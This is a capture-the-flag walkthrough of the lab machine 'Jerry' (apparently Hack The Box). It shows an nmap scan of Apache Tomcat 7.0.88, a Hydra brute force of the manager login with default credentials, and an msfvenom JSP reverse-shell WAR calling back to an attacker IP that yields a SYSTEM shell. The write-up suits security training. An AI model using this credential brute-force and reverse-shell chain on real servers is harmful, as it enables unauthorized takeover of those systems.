Jerry

10.10.10.95

Scanning and Enumeration

└─$ nmap -sC -sV -p 8080 10.10.10.95 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 17:04 EST
Nmap scan report for 10.10.10.95
Host is up (0.10s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.02 seconds

Web Page found

Found Credentials

Attempting Brute Force with HYDRA

wordlist brute force with Hydra
	apt install seclists
	find . | grep -i tomcat
	hydra -h 
└─$ HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -s 8080 10.10.10.95 http-get /manager/html 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-15 22:49:54
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[DATA] max 16 tasks per 1 server, overall 16 tasks, 79 login tries, ~5 tries per task
[DATA] attacking http-get://10.10.10.95:8080/manager/html
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
1 of 1 target successfully completed, 4 valid passwords found

As you can see, we were able to obtain 2 credentials, both of which were found. We forwarded our request to the burp proxy.

Enumerating the webpage we find something speacial, an upload section. We can also tell that this is a windows machine. Take a look here.

Lets try to upload a war file. Note, that a war file is like a zip file so we may have to find a jsp file, which are included in war files and make sure that that jsp file is a spooky file.

Generating a shell and establishing connection

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=9001 -f war > shell.war

set up listener
nc -lvnp 9001
└─$ nc -lvnp 9001                                      
listening on [any] 9001 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]                                                                              
(c) 2013 Microsoft Corporation. All rights reserved.                                                              
                                                                                                                  
C:\apache-tomcat-7.0.88>whoami                                                                                    
whoami                                                                                                            
nt authority\system

C:\apache-tomcat-7.0.88>